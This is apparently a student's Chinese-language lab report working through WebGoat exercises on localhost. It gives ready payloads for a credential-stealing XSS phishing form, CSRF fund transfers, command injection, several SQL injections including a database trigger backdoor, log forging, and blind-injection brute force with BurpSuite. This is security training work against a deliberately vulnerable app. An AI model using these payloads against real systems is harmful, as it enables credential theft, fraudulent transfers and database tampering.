WebGoat分为简单版和开发板,简单版是个Java的Jar包,只须要有Java环境便可,咱们在命令行里执行:java -jar webgoat-container-7.0.1-war-exec.jar
运行WebGoat:
html
WebGoat使用8080端口,因此在浏览器上访问localhost:8080/WebGoat
,进入WebGoat以后,能够看到有不少题目来让咱们进行练习。java
http://localhost:8080/WebGoat/catcher?PROPERTY=yes...
,完整的XSS攻击代码以下:</form> <script> function hack(){ XSSImage=new Image; XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value); } </script> <form name="phish"> <br> <br> <HR> <H2>This feature requires account login:</H2> <br> <br>Enter Username:<br> <input type="text" name="user"> <br>Enter Password:<br> <input type="password" name = "pass"> <br> <input type="submit" name="login" value="login" onclick="hack()"> </form> <br> <br> <HR>
在搜索框中输入攻击代码后点击搜索,会看到一个要求输入用户名密码的表单,如图所示:
web
输入用户名密码,点击登陆,WebGoat会将你输入的信息捕获并反馈给你:
正则表达式
攻击成功!
sql
<script>alert("lxm attack succeed!");</script>
当咱们输入错误用户信息后,服务器校验输入有误,返回错误页面并将错误内容展现给咱们看:
浏览器
这时若是咱们将带有攻击性的URL做为输入源,例如依旧输入<script>alert("lxm attack succeed!");</script>
,就会弹出对话框:
安全
虽然这个效果和上一个存储型XSS实验的效果相似,可是二者所用的原理不同,存储型XSS是持久化的,代码是存储在服务器中,比较典型的例子就是上面所用的留言板,而这个实验中用的是反射型XSS攻击是非持久化的,应用的场景好比欺骗用户本身去点击连接才能触发XSS代码,也就是说它的代码是不存在服务器中的,因此通常来讲存储型XSS攻击危害更大。服务器
咱们在message框中输入这样一串代码:<img src="http://localhost:8080/WebGoat/attack?Screen=277&menu=900&transferFunds=4000"/>
,注意这里面的Screen和menu的值每一个人的电脑可能不同,能够在当前页面的右边有个Parameters进行查看:
cookie
提交后,会在消息列表中看到一个新的消息,点击该消息,当前页面就会下载这个消息并显示出来,转走用户的4000元,从而达到CSRF攻击的目的。网络
一开始我是直接在message中写入了攻击代码,可是没有成功,因而我换了一种方法,先在浏览器中手动输入URL:localhost:8080/WebGoat/attack?Screen=268&menu=900&transferFunds=5000
进入确认转帐请求页面:
以后看了一下网页的源代码,发现transferFunds
的值变成了CONFIRM
:
因而点击了CONFIRM
按钮以后,再在浏览器中输入URL:localhost:8080/WebGoat/attack?Screen=268&menu=900&transferFunds=CONFIRM
,成功转走了5000元:
这个题是要求可以在目标主机上执行系统命令,咱们能够经过火狐浏览器下的一个扩展Firebug(就是右上角的小虫的标志)对源代码进行修改,例如在BackDoors.help
旁边加上"& netstat -an & ipconfig"
:
以后在下拉菜单中能看到咱们修改后的值:
选中修改后的值再点view
,能够看到命令被执行,出现系统网络链接状况:
咱们要经过注入SQL字符串的方式查看全部的天气数据,咱们上次实验作过相似的,只要加上一个1=1
这种永真式便可达到咱们的目的,依旧利用firebug,在任意一个值好比101
旁边加上or 1=1
:
选中Columbia
,点Go
,能够看到全部天气数据:
咱们输入的用户名会被追加到日志文件中,因此咱们可使用障眼法来使用户名为“admin”的用户在日志中显示“成功登陆”,在User Name
文本框中输入lxm%0d%0aLogin Succeeded for username: admin
,其中%0d
是回车,%0a
是换行符:
如图所示,攻击成功:
仍是和以前同样,基于select语句构造SQL注入字符串,在文本框中输入' or 1=1 --
:
点Go
,攻击成功,全部用户信息都被显示出来:
以用户Neville登陆,在密码栏中输入' or 1=1 --
进行SQL注入,可是登陆失败:
后面查看了一下网页源码,发现输入框对输入的字符长度进行了限制,最多只容许输入8个字符:
对字符长度进行修改,而后从新登陆,登陆成功:
咱们仍是用上一题的办法先以用户名Larry登陆,登陆以后看到浏览员工信息的按钮是ViewProfile
:
在网页代码中分析一下这个按钮,发现这个地方是以员工ID做为索引传递参数的,咱们要达到经过Larry来浏览老板帐户信息的目的,通常来讲老板的工资都应该是最高的,因此把其中的value值改成101 or 1=1 order by salary desc --
,这样老板的信息就会被排到第一个:
以后就能够查看到老板的信息:
先输一个101,获得了该用户的信息:
能够发现输入的语句没有验证,很容易进行SQL注入,输入注入语句:101; update employee set salary=10000
,成功把该用户的工资涨到了10000:
接下来使用语句101;CREATE TRIGGER lxmBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='20145215@163.com' WHERE userid = NEW.userid
建立一个后门,把表中全部的邮箱和用户ID都设为个人:
咱们的目标是找到pins
表中cc_number
字段值为1111222233334444
的记录中pin
字段的数值,从服务端页面返回的信息中能够知道,它只告诉你两种信息:账号有效或无效,咱们能够先输入语句101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 10000 );
查看pin
数值是否大于10000:
pin
的值在2000到2500之间,而后打开BurpSuite,关于BurpSuite代理的设置,你们能够参考zqh的博客,或者本身百度,比较简单。设置好代理后,抓个包而后send to intruder进行暴力破解,由于咱们只须要将载荷注入到一个地方,因此使用sniper
模式,再选择攻击的位置,先Clear
一下,把它默认的攻击位置所有取消,如图所示再选中account_number
后面的值点击Add
:
选好攻击位置后要设置载荷,因为咱们要进行数字类型的暴力破解,因此选择载荷类型为Numbers
,步长为1,再设置从2000到2500进行,设置完成后开始攻击:
能够看到2364的报文长度明显和其余不同,那这个值就应该就是2364:
将这个值输入到网页中,成功: